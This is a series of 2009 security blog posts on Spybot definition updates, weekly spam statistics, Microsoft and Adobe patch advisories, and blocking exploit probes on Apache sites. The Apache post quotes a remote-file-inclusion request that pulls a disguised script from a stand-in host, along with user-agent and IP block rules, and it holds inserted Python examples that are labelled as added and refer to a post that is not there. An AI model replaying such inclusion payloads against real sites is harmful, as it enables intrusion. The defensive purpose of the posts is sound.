July 29, 2009

Spybot Search and Destroy Definitions Updated on July 29, 2009

If you use Spybot Search and Destroy to protect your computer against spyware and malware, it is time again to run your manual updates. Malware writers are constantly modifying their programs to evade detection, so anti-malware vendors have to issue regular updates to keep up with the bad guys. New definitions and false positive fixes for Spybot Search and Destroy are usually released every Wednesday. This week's updates were released on schedule on July 29, 2009, as listed below. Some new and altered fake security programs were added to the detections, plus several new Trojans, rootkits and modified spam bots.

Updating Spybot Search and Destroy

Before you update Spybot Search and Destroy make sure you have the latest official version. Older versions are no longer supported and will cause you a lot of grief when you immunize and scan for problems. Only download Spybot S&D from the official website, at: spybot.info, or from its alternate domain: Safer-Networking.org. Fake versions with similar names will rip you off for payment to remove threats, whereas the real Spybot S&D is free (donations gladly accepted).

In case you are new to Spybot S&D, there are two ways to update the program and malware definitions. The preferred method (For Windows PCs) is to go to Start > (All) Programs > Spybot - Search & Destroy > Update Spybot - S&D. The independent update box will open. Leave the default options as is, unless you need all languages or want beta definitions, and click on "Search." Another box will open with "mirror" locations around the world where you can download updates. Select a location nearest to you from the list and click on "Continue." Make sure all updates are checked, then click on "Download." If all definitions are verified as being correct the check marks will disappear from the check boxes and be replaced with green arrow graphics. However, sometimes one or more mirror locations have not updated all of the definitions and you will get a red X for those definitions. Click on Go Back, select a different mirror, and try again. I have consistent success using Giganet or the Safer-Networking servers. When all updates have succeeded, click on "Exit."

You can also download the latest definition includes file from a clean PC and save them to a removable disk or drive, then install them into the Spybot S&D program while the infected PC is offline. This helps you disinfect a PC that cannot presently get online, or cannot access security websites for updates (because of the Conficker or similar malware), or due to other networking problems. The downloaded definition includes will look for a typical Spybot installation location and will update it instantly, as long as the program is closed during the updating process.

Download links and more instructions about using Spybot Search and Destroy are in my article titled "How to use Spybot Search & Destroy to fight malware".

The description of the latest definition updates and false positive fixes are in my extended comments below.

Additions to malware definitions made on July 29, 2009:


Malware (Includes rogue or fraudulent security programs, fake registry cleaners, and fake security alerts, plus other nasty programs)
+ Fraud.SystemGuard2009
+ Smitfraud-C.
+ WareOut
++ Win32.Agent.aal
++ Win32.Banload.ciho

PUPS (Possibly UnPopular Software or Potentially Unwanted Program)
++ DoubleD

Trojans (Trojans come to you disguised as something useful, or as a missing codec required to view a spammed video, but, like the Trojan Horse of antiquity, they hold dangerous contents that cause great harm! Many of these Trojans are Botnet infections, backdoors, malicious download agents and Rootkits.)
++ Exploit.MS08067.gen
++ PWS.Gamemania.gen
+ Virtumonde.sci
+ Virtumonde.sdn
+ Webshow
++ Win32.Agent.abqe
++ Win32.Agent.tdd
++ Win32.AutoRun.ww
++ Win32.Banker.ss
++ Win32.Banload.ciho
++ Win32.Prorat.jz
+ Win32.TDSS.clt
+ Win32.TDSS.gen
+ Win32.TDSS.or
+ Win32.TDSS.reg
+ Win32.TDSS.rtk
++ Win32.Udr.gen
+ Zlob.Downloader.apl
+ Zlob.Downloader.bs


Total: 1414855 fingerprints in 489974 rules for 4774 products.

False positive detections reported, discussed, or fixed this week:

There was a confirmed False Positive detection of "Win32.TDSS.rtk" in a 1994 game, named Master of Magic. This was fixed today. ;-)

Several forumites have reported a false positive detection of Virtumonde in %system32%\zipfldr.dll. Those folks needed to update to Spybot S&D 1.6.2 to fix these false alerts. Check your version number (Help > About) and update if it is not at least 1.6.2.

After you update definitions to fix false positives a restart of either TeaTimer or the Computer is required. If this doesn't fix the false positives, you may need to reset the TeaTimer detection list, as follows:

Right click the (TeaTimer) Resident tray icon
Select "Reset lists"

If that fails also, please read the rest of the things to try on this forum page, in replies #2 and #4.

When TeaTimer blocks the file you can also allow the file to be executed (also remove the check mark for deletion). You can exclude any file from further detections during a scan by right clicking the item in the Spybot S&D scan result and selecting "exclude this detection from further searches".

If you keep getting false positive detections and broken programs, due to TeaTimer issues, try disabling that module. You can toggle TeaTimer off and on by switching into Advanced Mode > Tools > Resident.

False Positives are reported and discussed in the Spybot S&D False Positives Forum.

As mentioned earlier, links and more instructions about using the program, or reporting suspected false positives, are found in my article titled How to use Spybot Search & Destroy to fight malware.


July 26, 2009

My Spam analysis for July 20 - 26, 2009

This is the latest entry in my weekly series about classifications of spam, according to my custom filter rules used by MailWasher Pro. The categories are shown on the "Statistics" page > "Junk Mail," as a pie chart, based on my custom filters and blacklist. The amount of email flagged as spam is shown on the "Summary" page of Statistics.

The volume of spam coming to my various honeypots and user accounts has remained the same two weeks in a row, at 21%. This suggests to me that some of the Botnet owners have once again restored their Command and Control servers. This is a cat and mouse game, with criminals leasing servers for use as Botnet controllers and authorities or upstream providers shutting them down.

The classifications of spam in my analysis can help you adjust your email filters according to what is most common, on a weekly basis. Most of the spam this week was for male enhancement scams and the fake Canadian Pharmacy, which sells illicit and counterfeit pharmaceuticals like Viagra, and is hosted on Botnetted PCs. Next, was spam for weight loss ripoffs and casinos.

See my extended comments for this week's breakdown of spam by category, for July 20 - 26, 2009, and the latest additions to my custom MailWasher Pro filters.

MailWasher Pro spam category breakdown for July 20 - 26, 2009. Spam amounted to 21% of my incoming email this week. This represents no change from last week. Thursday July 23 was the worst day for spam, for the second week in a row.
Male Enhancement Patches, etc: 23.91%
Canadian Pharmacy spam: 21.74%
Viagra spam: 10.87%
Yahoo Groups Spam Link: 10.87%
"Other filters": (See my MWP Filters page) 8.70%
Known Spam Domains (a great filter!): 6.52%
Weight Loss Scams (e.g. Acai Berry) 4.35%
Known X-Mailer Spam: 4.35%
Casino spam: 2.17%
Pills Spam: 2.17%
Herbal Spam: 2.17%
DNS Blacklisted (SpamCop, Spamhaus): 2.17%

The latest weekly updates to my custom MailWasher Pro filters were the Viagra, Canadian Pharmacy, Fake MSN Newsletter and URL Shortener spam filters. I also moved the Subject is RE: or FW: filter down. Everything else is working as it should. My spam filters are very effective, especially the Canadian Pharmacy spam filters. If you're not already using MailWasher Pro to filter out spam, read on...

MailWasher Pro intercepts POP3 and IMAP email before you download it to your desktop email client (e.g. Microsoft Outlook, Outlook Express, Windows Live Mail) and scans it for threats or spam content, then either manually or automatically deletes any messages matching your pre-determined criteria and custom filters. It is my primary line of defense against incoming spam, scams, phishing and exploit attacks. If you are not already using this fine anti-spam tool I invite you to read about it on my MailWasher Pro web page. You can download the latest version and try it for free for a month. Registration is only required once, for the life of the program.

To protect your computer from web pages rigged with exploit codes, malware in email attachments, dangerous links to hostile web pages, JavaScript redirects, Phishing scams, or router DNS attack codes, I recommend Trend Micro Internet Security. It has strong realtime monitoring modules that stop rootkits and spam Trojans from installing themselves into your operating system. Also known as PC-cillin, it is very frequently updated as new and altered malware definitions become available and it checks for web based threats and new malware definitions by searching secure online servers owned by Trend Micro. This is referred to as "in-the-cloud" security.

All of the spam and scams targeting my accounts were either automatically deleted by my custom MailWasher Pro spam filters, or, if they made it through, were reported to SpamCop, of which I am a reporting member, and manually deleted. MailWasher Pro is able to forward messages marked as spam to SpamCop, which then sends a confirmation email to you, containing a link. You must click on the enclosed reporting link and open it in your browser, then manually submit your report. This is how SpamCop wants it done.


July 25, 2009

Microsoft and Adobe to release out-of-band patches

There are some new vulnerabilities to be alerted to that are being exploited in the wild right now and may impact you. Some affect Windows computers, while others are cross platform (Linux, Mac, Solaris). Foremost among the vulnerable software are Internet Explorer, Visual Studio components and three Adobe programs.

First off, Microsoft just announced that they will be releasing two out-of-cycle security patches on Tuesday, July 28, 2009. This is very rare for Microsoft, who mainly stick to a once-a-month Patch Tuesday schedule. The two vulnerabilities are being actively exploited in the wild and cannot wait until August 11 to be fixed. Too many PCs would be compromised by then.

If you have followed Microsoft's recommendation and set your Windows PCs to download and install Windows Updates Automatically, you will receive them sometime during the day of July 28, 2009, depending on where you are located. For folks living in the Eastern US time zone these updates will probably show up around 2 PM. If you are going to be away from your PC during that afternoon you should save any work in progress, because Windows Update will reboot your computer without interaction, if required to install those updates, after popping up a pending shutdown alert. If you aren't there to dismiss that alert your PC will be automatically rebooted to finish installing these critical patches.

Adobe has three products being exploited by cyber criminals this week. They are Adobe's Acrobat, Reader and Flash Player. This time the exploit lies in the way in which Adobe Reader and Acrobat are set to automatically run embedded Flash code when a person opens a .pdf document (pdf = Portable Document Format) in any current version of Reader or Acrobat. In case you were wondering, Acrobat is an expensive program used to create pdf documents. Reader opens them for reading and printing. Flash is active content for interactive forms and video presentations on web pages, or for embedding into pdf files. YouTube videos are encoded using Adobe Flash and are viewed in Flash Player.

Adobe will be releasing patches on two days this month. An update for Flash Player v9 and v10 for Windows, Macintosh, and Linux will be available by July 30, 2009. They expect to provide an update for Adobe Reader and Acrobat v9.1.2 for Windows, Macintosh and UNIX by July 31, 2009. While you patiently wait for those patches you can protect your computers from getting hacked by hostile pdf documents by applying two officially recommended workarounds.

UPDATE:
August 2, 2009

Both Microsoft and Adobe did release the promised, out-of-band, critical updates, fixing the reported vulnerabilities in Microsoft's Internet Explorer and Visual Studio ATL and in Adobe's Flash, Reader and Acrobat. If you have not already done so, please run the Secunia Online Software Inspector, to see what insecure software is installed on your computers. Download links are provided in its report.

Note: If you are a programmer and have written any code that utilizes the Microsoft Visual Studio ATL, you may need to make changes to get those controls working again. See this MSDN page for more information about how the security update of 7/28/09 will impact your code.

Details about the Adobe vulnerabilities and their workarounds are in my extended content.

To protect your PCs from exploitation from Flash embedded in hostile pdf documents, apply the following workarounds as recommended by Adobe.

Deleting, renaming, or removing access to the authplay.dll file that ships with Adobe Reader and Acrobat v9.x mitigates the threat for those products, but users will experience a non-exploitable crash or error message when opening a PDF that contains SWF content. Depending on the product, the authplay.dll that ships with Adobe Reader and Acrobat 9.x for Windows is typically located at C:\Program Files\Adobe\Reader 9.0\Reader\authplay.dll, or at C:\Program Files\Adobe\Acrobat 9.0\Acrobat\authplay.dll. Windows Vista users should consider enabling UAC (User Account Control) to mitigate the impact of a potential exploit. Flash Player users should exercise caution in browsing untrusted websites.

Again, Adobe plans to release patched versions of Flash Player on, or by July 30 and Reader/Acrobat on July 31, 2009. Always make sure that you get Adobe updates from Adobe.com. Do not trust any other source or domain names, as criminals disguise their malware as Flash Player updates or "required video codecs" to fool people lured to hostile websites via spam links. Links to Adobe should be verified in your browser's address bar before you accept an upgrade of Flash or Adobe Reader. Adobe Reader has a built in link to check for updates, under the Help menu, using its own downloader module.

Microsoft will be releasing critical updates on Tuesday, July 28, 2009. If you don't have Automatic Windows Updates turned on you must go get them manually. There is a link to Windows/Microsoft Update on the Start Menu of Windows 2000 through Vista/Windows 7. This will open Internet Explorer and take you to the official Windows Update web page.

If you already have Internet Explorer (IE) open you can go there via the Windows Update link under the Tools menu in IE 5 through 7, and under the Safety menu in IE 8.


July 22, 2009

Spybot Search and Destroy Definitions Updated on July 22, 2009

If you use Spybot Search and Destroy to protect your computer against spyware and malware, it is time again to run your manual updates. Malware writers are constantly modifying their programs to evade detection, so anti-malware vendors have to issue regular updates to keep up with the bad guys. New definitions and false positive fixes for Spybot Search and Destroy are usually released every Wednesday. This week's updates were released on schedule on July 22, 2009, as listed below. Some new and altered fake security programs were added to the detections, plus several new Trojans, rootkits and modified spam bots.


Additions to malware definitions made on July 22, 2009:


Keyloggers
+ KGBKeylogger.REFOG

Malware (Includes rogue or fraudulent security programs, fake registry cleaners, and fake security alerts, plus other nasty programs)
+ BPSSpywareStriker
+ Fraud.PersonalAntivirus
+ Smitfraud-C.
+ Smitfraud-C.generic
++ Win32.Agent.aya
+ Win32.Agent.ieu
++ Win32.Agent.na
+ Win32.Banker
+ Win32.FraudLoad
+ Win32.FraudLoad.edt
++ Win32.Rbot.seh
+ Win32.Renos
+ ZenoSearch

PUPS (Possibly UnPopular Software or Potentially Unwanted Program)
+ MyWay.MyWebSearch (Search hijacker)
+ Zango

Trojans (Trojans come to you disguised as something useful, or as a missing codec required to view a spammed video, but, like the Trojan Horse of antiquity, they hold dangerous contents that cause great harm! Many of these Trojans are Botnet infections, backdoors, malicious download agents and Rootkits.)
+ Win32.TDSS.pe
+ Win32.TDSS.rtk
+ Win32.Podnuha.rtk
++ Win32.Agent.pdl
++ Win32.Agent.pql
++ Win32.Agent.kna
++ Win32.Agent.EDZG
+ Virtumonde.Dll
+ Virtumonde.sci
+ Virtumonde.sdn

Worm
+ Win32.Koobface

Total: 1469502 fingerprints in 506102 rules for 4767 products.

False positive detections reported, discussed, or fixed this week:

Spybot Resident (TeaTimer) alerts on install of Advanced System Care and terminates the process. This is a false positive and has been fixed with this week's updates.

Finally, there is a controversy in several security forums and anti-malware companies regarding a program called SpyHunter, from Enigma Software. Spybot S&D currently flags SpyHunter as a PUP (a Potentially Unwanted Program), as does Symantec, the maker of Norton security products. A happy user of that program has posted a question about a possible false positive in Spybot's detection of SpyHunter as a PUP. If I learn of a definitive answer to this question I will post it, either in a follow-up update or in next week's article about Spybot updates. This is indeed an enigma, just like the name of the company that makes SpyHunter.



July 19, 2009

My Spam analysis for July 13 - 19, 2009

The volume of spam coming to my various honeypots and user accounts has increased markedly this week, after last week's decrease. This suggests to me that some of the Botnet owners have once again restored their Command and Control servers. This is a cat and mouse game, with criminals leasing servers for use as Botnet controllers and authorities or upstream providers shutting them down.

The classifications of spam in my analysis can help you adjust your email filters according to what is most common, on a weekly basis. Most of the spam this week was for the fake Canadian Pharmacy, which sells illicit and counterfeit pharmaceuticals like Viagra, and is hosted on Botnetted PCs. Next, was male enhancement scams, weight loss ripoffs, casinos and some Nigerian 419 scams.

See my extended comments for this week's breakdown of spam by category, for July 13 - 19, 2009, and the latest additions to my custom MailWasher Pro filters.

MailWasher Pro spam category breakdown for July 13 - 19, 2009. Spam amounted to 21% of my incoming email this week. This represents a 9% increase from last week. Thursday July 16 was the worst day for spam.
"Other filters": (See my MWP Filters page) 16.98%
Canadian Pharmacy spam: 15.09%
Male Enhancement Patches, etc: 11.32%
Known Spam Domains (a great filter!): 9.43%
Viagra spam: 9.43%
Weight Loss Scams (e.g. Acai Berry) 7.55%
Known X-Mailer Spam: 7.55%
Casino spam: 5.66%
Counterfeit Watches: 5.66%
Nigerian 419 Scams: 3.77%
Subject is: RE: or FWD: 3.77%
Blacklisted Domains/Senders (e.g: kef+diz@+): 3.77%

The latest weekly additions to my custom MailWasher Pro filters were the Watches, Stud Tips and Breast enlargement filters. Everything else is working as it should. My spam filters are very effective, especially the Canadian Pharmacy spam filters. If you're not already using MailWasher Pro to filter out spam, read on...



July 18, 2009

Protect your Apache hosted website from Chinese exploit attacks

While reading my raw access logs I noticed that a lot of the recent exploit attacks hitting my website are coming from China and Korea. I can't say with certainty that the attacks originated in those countries, because they could be coming from compromised servers. Do you care whether an attack originated at the server that is attacking yours? Hell no! If some black hat hacker is commandeering a hundred thousand Chinese servers and using them to attack my servers I block the Chinese IP addresses since they are attacking me.

Here is a typical, recent exploit attempt, coming from a server in China. I have changed the destination URL to example.com for your safety.

218.246.20.221 - - [17/Jul/2009:14:36:29 -0700] "GET //modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://example.com/gboard/rs/copyright.txt? HTTP/1.1" 403 137 "-" "Mozilla/5.0"

If I were running a vulnerable version of the targeted "Coppermine" software, that remote file inclusion attempt would have returned a 200 OK instead of a 403 Forbidden response. That would have led to the exploitation of my website, and hidden iframes would then redirect my visitors to hostile destinations. I won't willingly allow that to happen and neither should other webmasters.

So, you ask, how do I block these Chinese servers from attacking my websites? If your websites are hosted on Apache web servers I can offer you two effective means of blocking those exploit probes. The details follow.

Blocking Chinese servers or personal computers from your websites

Several years ago I began reading the access logs for my websites and learned that hackers were targeting me with various exploit attacks. The goal of all of those attacks is to find an unpatched, vulnerable version of a PHP script that is installed on your website and inject hostile files into it, then use them to write iframe redirection codes to other files in your website. Take a look at this previously listed example:

218.246.20.221 - - [17/Jul/2009:14:36:29 -0700] "GET //modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://example.com/gboard/rs/copyright.txt? HTTP/1.1" 403 137 "-" "Mozilla/5.0"

First of all, let's run a Whois lookup to see where that IP address is located.


http://whois.domaintools.com/218.246.20.221
IP Location: China China Beijing Development & Research Center Of State Council Net
inetnum: 218.246.0.0 - 218.246.31.255

Next, I Googled on the exploit path: GET //modules/coppermine/themes/coppercop/theme.php?THEME_DIR= and found many results defining this attack. Here is but one:
Coppermine Photo Gallery contains a flaw that may allow a remote attacker to execute arbitrary code. The issue is triggered when sending a specially crafted URL request to the theme.php script using the THEME_DIR variable to specify a malicious file from a remote system as a parameter.

The next parameter lists the http destination where a text file is hosted.
http://example.com/gboard/rs/copyright.txt?

That file is really a PHP script in disguise and it is usually hosted unknowingly on somebody's compromised website. Note, that some exploit files are actually hosted on hostile servers owned by cyber criminals.

Then we come to the number 403. It signifies that this attempt was Forbidden by my server configuration. I will be showing you how to accomplish the same thing on your server, or website.

Last, the stated user agent, "Mozilla/5.0" with nothing after it, is one commonly used by server hacking programs. Another common exploit tool identifies itself as "libwww-perl/(version number)".
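The dissection above (source IP, requested path and query, response status, user agent) can be automated against a whole access log. The following is an added example, not code from the post: it parses Apache combined-format lines, flags query parameters whose value is a remote URL (the remote file inclusion shape seen here) and the two hack-tool user agents named above, and reports whether each probe was already answered with a 403. The regex and the sample log are constructed for this example; only the first log line is the one quoted in the post.

```python
import re
from urllib.parse import parse_qsl

# Apache "combined" access log format. The regex is constructed for this example;
# field names follow the LogFormat that produces lines like the one quoted above.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# The two hack-tool user agents called out in the post: a bare "Mozilla/5.0"
# with nothing after it, and anything beginning with libwww-perl/.
HACK_TOOL_UA = (
    re.compile(r'^Mozilla/5\.0$'),
    re.compile(r'^libwww-perl/'),
)

# Constructed sample log: line 1 is the probe quoted in the post; lines 2 and 3
# are made-up requests (a normal browser, and a libwww-perl client that got a 200).
SAMPLE_LOG = """\
218.246.20.221 - - [17/Jul/2009:14:36:29 -0700] "GET //modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://example.com/gboard/rs/copyright.txt? HTTP/1.1" 403 137 "-" "Mozilla/5.0"
192.0.2.10 - - [17/Jul/2009:14:40:02 -0700] "GET /index.php?page=about HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1) Firefox/3.5"
198.51.100.7 - - [17/Jul/2009:14:41:15 -0700] "GET /gallery/?dir=themes/default HTTP/1.1" 200 2048 "-" "libwww-perl/5.829"
"""


def parse_line(line):
    """Split one combined-format line into its fields, or return None if malformed."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def remote_include_params(target):
    """Query parameters whose value is an absolute URL: the shape of an RFI probe."""
    _, _, query = target.partition('?')
    return [(k, v) for k, v in parse_qsl(query, keep_blank_values=True)
            if v.lower().startswith(('http://', 'https://', 'ftp://'))]


def is_hack_tool_ua(ua):
    return any(p.match(ua) for p in HACK_TOOL_UA)


def assess(line):
    """Classify one line: None if malformed, else a dict with the reasons it is suspicious."""
    rec = parse_line(line)
    if rec is None:
        return None
    reasons = []
    rfi = remote_include_params(rec['target'])
    if rfi:
        reasons.append('remote file inclusion probe via ' + ', '.join(k for k, _ in rfi))
    if is_hack_tool_ua(rec['ua']):
        reasons.append('hack-tool user agent ' + repr(rec['ua']))
    return {'ip': rec['ip'], 'status': int(rec['status']),
            'blocked': rec['status'] == '403', 'reasons': reasons}


def scan(log_text):
    """Return the assessments of every suspicious line, in log order."""
    out = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        r = assess(line)
        if r and r['reasons']:
            out.append(r)
    return out


if __name__ == '__main__':
    for hit in scan(SAMPLE_LOG):
        state = 'blocked' if hit['blocked'] else 'NOT blocked (status %d)' % hit['status']
        print(hit['ip'], state, '; '.join(hit['reasons']))
```

A probe that shows up as "NOT blocked" is the one to act on: it tells you which user agent or address range your .htaccess rules do not yet cover.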

Blocking hacking attacks by user agent

The first line of defense is to block access to known hack-tool user agents. The two I have shown in this article are the most frequently used agents, but others are used from time to time. The following directives can be added to your web-root .htaccess file to block access to all files for these hacker user agents:

Options +FollowSymLinks
RewriteEngine On
RewriteBase /

RewriteCond %{HTTP_USER_AGENT} ^Mozilla/5\.0$ [OR]
RewriteCond %{HTTP_USER_AGENT} ^libwww-perl/
RewriteRule .* - [F]

Protecting a dedicated, semi-dedicated, or VPS server from Chinese exploit attacks

Business and reseller hosting accounts are typically hosted on dedicated, or semi-dedicated servers. The lessee is usually expected to manage the leased server themselves, although managed hosting is usually available at a monthly cost. People renting or owning dedicated servers have technicians who manage updates, patches and firewalls.

If you manage your own web server that runs on Linux or Unix, you can apply my frequently updated Chinese iptables blocklist to your server's firewall. There is an up to date blocklist embedded on that page. You can copy and paste the list of IP addresses, in iptables format, into a Linux APF firewall, or a similar firewall. Instructions are found here for installing these firewalls and adding new rules.

If you lease a dedicated server and don't understand how to install and update the firewall ask for technical assistance from your hosting company. They usually provide firewall updates as a service to dedicated and VPS customers, for the protection of all involved.

Protecting individual websites from Chinese exploit attacks

Most private websites are hosted on shared hosting servers, where you are e pluribus unum - one out of many - accounts. You will not have access to the server's firewall, or the Linux operating system. You are only able to control access to your own web pages. You need to apply my Chinese .htaccess blocklist to your public web root .htaccess file.

Experienced webmasters know that server files beginning with a period are normally hidden server configuration files. These files can be made visible by configuring your FTP client with the remote mask code: -al which unhides .htaccess and other hidden server control files in the remote location browser section. Some FTP clients may have a simple checkbox to display these files. Online control panels usually include a website file browser and usually they show files beginning with a period.

Not every website comes with a .htaccess file, so, if you don't see one and hidden files are displayed, you will need to create a new .htaccess file. Or, just copy the contents of my blocklist, between the sections marked as containing the .htaccess rules and paste it into a new plain text file. Save that file as .htaccess and upload it to your website, in the public_html or equivalent directory. Be sure to immediately test your website to ensure that you haven't pasted in an uncommented character by accident, which will result in a Server 500 lockout error. .htaccess comments begin with a # sign. Directives begin with specific characters or words. Be careful when editing your .htaccess file. If you include an uncommented word that is not recognized as a legitimate command, a Server 500 will result and nobody will see your web pages until this is fixed.

Example of a good comment in a .htaccess file:

# This is a legitimate comment in .htaccess

Example of a bad comment in a .htaccess file:

This comment will cause a Server 500 error because it is not preceded by a # symbol.

Using .htaccess Mod-Access to block offending IP addresses

Here is an example of the correct .htaccess syntax to deny access to the offending Chinese address that is listed throughout this article.

<Files *>
deny from 218.246.20.221
</Files>

That blocks just that one server IP address. This doesn't accomplish much when there are several million Chinese and Korean IP addresses that may be used to attack your server. Instead of listing every one of those IP addresses, I use complete ranges assigned to the ISP or hosting company, as I discover them. The format used is called CIDR, which stands for Classless Inter-Domain Routing. Below is the CIDR that encompasses the attacker's IP address.

<Files *>
deny from 218.246.0.0/16
</Files>

Using the CIDR 218.246.0.0/16 blocks all IP addresses between 218.246.0.0 and 218.246.255.255. All (four) of my .htaccess blocklists usually list entire CIDRs, although there may be a few individual IPs included here and there. There are dozens to hundreds of CIDRs in my various blocklists. The Chinese blocklist is ever-growing as I discover new CIDRs that have been assigned to servers and ISPs in that part of the world. Many webmasters apply my blocklists to protect their servers and websites from exploiters, hackers, spammers and scammers.
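The CIDR arithmetic above, as an added Python example (not code from this article or from the blocklists it links to), using the standard library's ipaddress module. It works out the first and last address of a CIDR, reads "deny from" lines in the .htaccess form shown above, tests whether a given address is covered, merges entries that overlap, and renders the same list as plain iptables commands for the dedicated-server case discussed earlier (plain iptables syntax is assumed here, not the APF rule-file format). The deny list is constructed for the example: the /16 and the single address are the ones from the article, and 192.0.2.0/24 is a documentation range. The same functions apply to any CIDR, for instance the 62.173.32.0/19 mentioned in the Nigerian scam post further down.

```python
import ipaddress

# Constructed deny list in the .htaccess style shown above. The single
# address is deliberately inside the /16 to show how merging removes it.
HTACCESS_DENY = """\
# Example blocklist (constructed for this example)
<Files *>
deny from 218.246.20.221
deny from 218.246.0.0/16
deny from 192.0.2.0/24
</Files>
"""


def cidr_range(cidr):
    """Return (first address, last address, number of addresses) for a CIDR."""
    net = ipaddress.ip_network(cidr, strict=False)
    return str(net[0]), str(net[-1]), net.num_addresses


def parse_deny_list(text):
    """Extract the networks from 'deny from' lines.

    A bare IP becomes a /32. Comment lines (starting with #), blank lines and
    the <Files> wrapper are skipped; anything else is ignored here, although
    Apache itself would reject an unknown directive with a 500 error.
    """
    nets = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        if len(parts) == 3 and parts[0].lower() == "deny" and parts[1].lower() == "from":
            nets.append(ipaddress.ip_network(parts[2], strict=False))
    return nets


def is_blocked(ip, nets):
    """True if ip falls inside any network in the deny list."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in nets)


def collapse(nets):
    """Merge overlapping or adjacent entries into the smallest equivalent list.
    The single host above is already inside 218.246.0.0/16, so it disappears."""
    return [str(n) for n in ipaddress.collapse_addresses(nets)]


def to_iptables(nets):
    """Render the merged list as iptables DROP rules for a server firewall."""
    return [f"iptables -A INPUT -s {n} -j DROP" for n in ipaddress.collapse_addresses(nets)]


if __name__ == "__main__":
    print(cidr_range("218.246.0.0/16"))
    deny = parse_deny_list(HTACCESS_DENY)
    print("218.246.20.221 blocked:", is_blocked("218.246.20.221", deny))
    for rule in to_iptables(deny):
        print(rule)
```

Merging before publishing a blocklist keeps it short and makes it obvious when a newly discovered address is already covered by an existing range.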

Note that only the iptables blocklist will keep the attempted hacks from appearing in the access logs for individual websites. If you can only use my .htaccess blocklists you will still see these attacks in your logs, but they should all result in a server 403 (Forbidden) response.

My .htaccess blocklists are linked to on this page.

My iptables blocklists are found here.


July 15, 2009

Spybot Search and Destroy Definitions Updated on July 15, 2009

If you use Spybot Search and Destroy to protect your computer against spyware and malware, it is time again to run your manual updates. Malware writers are constantly modifying their programs to evade detection, so anti-malware vendors have to issue regular updates to keep up with the bad guys. New definitions and false positive fixes for Spybot Search and Destroy are usually released every Wednesday. This week's updates were released on schedule on July 15, 2009, as listed below. Some new and altered fake security programs were added to the detections, plus several new Trojans, rootkits and modified spam bots.

Updating Spybot Search and Destroy

Before you update Spybot Search and Destroy make sure you have the latest official version. Older versions are no longer supported and will cause you a lot of grief when you immunize and scan for problems. Only download Spybot S&D from the official website, at: spybot.info, or from its alternate domain: Safer-Networking.org. Fake versions with similar names will rip you off for payment to remove threats, whereas the real Spybot S&D is free (donations gladly accepted).

In case you are new to Spybot S&D, there are two ways to update the program and malware definitions. The preferred method (For Windows PCs) is to go to Start > (All) Programs > Spybot - Search & Destroy > Update Spybot - S&D. The independent update box will open. Leave the default options as is, unless you need all languages or want beta definitions, and click on "Search." Another box will open with "mirror" locations around the world where you can download updates. Select a location nearest to you from the list and click on "Continue." Make sure all updates are checked, then click on "Download." If all definitions are verified as being correct the check marks will disappear from the check boxes and be replaced with green arrow graphics. However, sometimes one or more mirror locations have not updated all of the definitions and you will get a red X for those definitions. Click on Go Back, select a different mirror, and try again. I have consistent success using Giganet or the Safer-Networking servers. When all updates have succeeded, click on "Exit."

Download links and more instructions about using Spybot Search and Destroy are in my article titled "How to use Spybot Search & Destroy to fight malware".

The description of the latest definition updates and false positive fixes are in my extended comments below.

Additions to malware definitions made on July 15, 2009:

Adware
++ Need2Find
+ RXToolbar

Dialer
++ EroDial

Keyloggers
+ ActualSpy
+ Ardamax

Malware (Includes rogue or fraudulent security programs, fake registry cleaners, and fake security alerts, plus other nasty programs)
++ Win32.Agent.na
++ Win32.Agent.pql
+ Win32.Banker
+ Win32.FraudLoad
+ Fraud.PersonalAntivirus
+ Fraud.Sysguard
++ Fraud.UltimateDefender
++ Fraud.WiniblueSoftware
++ Fraud.WiniFighter
+ Fraud.XPDeluxeProtector
+ Smitfraud-C.
++ Win32.Rbot.seh
+ Win32.Renos
+ WinWebSecurity

PUPS (Possibly UnPopular Software or Potentially Unwanted Program)
+ Hotbar
+ MyWay.MyWebSearch (Most prevalent PUP malware detection last week)
++ Turkojan

Trojans (Trojans come to you disguised as something useful, or as a missing codec required to view a spammed video, but, like the Trojan Horse of antiquity, they hold dangerous contents that cause great harm! Many of these Trojans are Botnet infections, backdoors, malicious download agents and Rootkits.)
+ PurityScan
+ Virtumonde.sci
+ Virtumonde.sdn
+ Win32.Agent.h
+ Win32.Agent.qt
++ Win32.Agent.ws
++ Win32.Dursg
+ Win32.FraudLoad.pd
+ Win32.Iksmas.ai
+ Win32.IRCBOT.cmn
++ Win32.Kolabc.ezg
+ Win32.Koobface
++ Win32.LDPinch.m
++ Win32.Monderb.aqpu
++ Win32.Podnuha.rtk
+ Win32.Rbot.fx
+ Win32.Small.azl
++ Win32.Small.rn
+ Win32.TDSS.clt
+ Win32.TDSS.dt
+ Win32.TDSS.gen
+ Win32.TDSS.pe
+ Win32.TDSS.rtk
++ Win32.VB.ruk
+ Win32.Virut.bg
+ Win32.ZBot
+ Zlob.Downloader
+ Zlob.PerfectCodec

Worm
++ Blackmail
+ Win32.Koobface

Total: 1467822 fingerprints in 505684 rules for 4757 products.

False positive detections reported, discussed, or fixed this week:

Spybot Resident (TeaTimer) alerts on install of Advanced System Care and terminates the process. This is being investigated as a probable false positive.

Heuristic detections of infections in regsvr32.exe and rundll32.exe are false positives with the heuristics part of the single file scanner. A fix was released on 07-15-2009.

Spybot detecting MBAM as malware has been fixed! MalwareBytes AntiMalware is not an infection; it is the opposite! I just used it to clean up a severely infected system. Download new definitions, restart and scan again.

After you update definitions to fix false positives a restart of either TeaTimer or the Computer is required. If this doesn't fix the false positives, you may need to reset the TeaTimer detection list, as follows:

Right click the (TeaTimer) Resident tray icon
Select "Reset lists"

If that fails also, please read the rest of the things to try on this forum page, in replies #2 and #4.

